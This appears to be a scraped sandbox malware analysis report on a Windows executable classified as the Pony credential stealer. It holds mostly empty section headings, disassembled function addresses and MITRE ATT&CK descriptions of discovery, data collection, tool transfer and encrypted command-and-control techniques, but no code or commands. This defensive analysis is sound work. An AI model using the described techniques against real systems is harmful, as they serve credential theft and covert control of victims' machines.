Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Pony

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Function 0041C2B3, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 55
memoryCOMMON

Function 0041C267, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 170
memorywindowCOMMON

Function 004218A6, Relevance: 15.1, APIs: 10, Instructions: 122
COMMON

Function 004106D5, Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 156
stringfilelibraryCOMMON

Function 0040EC16, Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174
registryCOMMON

Function 0040D423, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142
encryptionstringCOMMON

Function 00404C68, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107
filestringCOMMON

Function 004043DD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139
libraryloaderCOMMON

Function 0040890D, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77
filestringCOMMON

Function 00403F86, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117
filestringCOMMON

Function 0040A364, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116
stringencryptionCOMMON

Function 00404FD8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
filestringCOMMON

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre